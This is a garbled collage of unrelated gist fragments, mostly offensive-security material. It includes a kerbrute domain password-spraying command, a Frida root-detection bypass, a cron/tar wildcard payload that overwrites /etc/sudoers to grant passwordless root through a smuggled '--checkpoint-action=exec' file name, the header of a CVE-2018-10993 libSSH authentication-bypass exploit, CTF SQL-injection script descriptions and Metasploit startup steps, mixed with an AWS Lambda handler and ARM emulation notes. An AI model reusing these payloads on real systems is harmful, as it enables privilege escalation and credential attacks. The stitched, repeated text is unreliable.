With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import json | |
print('Loading function') | |
def lambda_handler(event, context): | |
#1. Parse out query string params | |
transactionId = event['queryStringParameters']['transactionId'] | |
transactionType = event['queryStringParameters']['type'] | |
transactionAmount = event['queryStringParameters']['amount'] |
// $ frida -l antiroot.js -U -f com.example.app --no-pause | |
// CHANGELOG by Pichaya Morimoto ([email protected]): | |
// - I added extra whitelisted items to deal with the latest versions | |
// of RootBeer/Cordova iRoot as of August 6, 2019 | |
// - The original one just fucked up (kill itself) if Magisk is installed lol | |
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
Java.perform(function() { | |
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
docker run -ti --rm --mount src=kali-root,dst=/root --mount src=kali-postgres,dst=/var/lib/postgresql my-kali | |
# | |
# Notes to setup/run a persistent kali docker container (my notes to setup on my usual windows work PC) | |
# credit to @Airman604 | |
# https://medium.com/@airman604/kali-linux-in-a-docker-container-5a06311624eb | |
# https://hub.docker.com/r/kalilinux/kali-linux-docker/ | |
# https://www.kali.org/news/official-kali-linux-docker-images/ | |
# https://hub.docker.com/?ref=login&overlay=onboarding | |
# Setup Docker Desktop for Windows | |
# Requires Windows10 Pro and Hyper-V |
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ | |
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE> | |
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh | |
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh | |
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh | |
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh | |
echo "" > "--checkpoint-action=exec=sh test.sh" | |
echo "" > --checkpoint=1 |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/env python3 | |
from inspect import _empty, signature | |
def get_multiparameter_callback(callback, **parameters): | |
callback_sig_p = signature(callback).parameters | |
# If some provider parameter does not belong to callback parameters. | |
unexpected_parameters = list(parameters.keys() - callback_sig_p.keys()) | |
if len(unexpected_parameters) > 0: |
image_extract.py
performs character extraction on targetted against the HackerOne H1-702 CTF announcement imagedecrypt_sqli.py
performs blind sqli data extraction with encrypted payloads targetting against the FliteThermostat APItiming_attack.py
performs an HTTP piplining based timing against the FliteThermostat Backendwordlist_generator.py
generates wordlists from a give corpus or set of corpuseshttplib.py
performs efficient asynchronous HTTP requests against the FliteThermostat BackendYou might want to read this to get an introduction to armel vs armhf.
If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.
First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static
so that you can run ARM executables directly on linux
If there's no qemu-arm-static
in the package list, install qemu-user-static
instead
#!/usr/bin/python3 | |
# | |
# CVE-2018-10993 libSSH authentication bypass exploit | |
# | |
# The libSSH library has flawed authentication/connection state-machine. | |
# Upon receiving from connecting client the MSG_USERAUTH_SUCCESS Message | |
# (as described in RFC4252, sec. 5.1.) which is an authentication response message | |
# that should be returned by the server itself (not accepted from client) | |
# the libSSH switches to successful post-authentication state. In such state, |
#Start postgres | |
root@kali ~# systemctl start postgresql | |
#Start metasploit database | |
root@kali ~# msfdb init | |
#Start metasploit framework | |
root@kali ~# msfconsole | |
#Iniciado o Metasploit |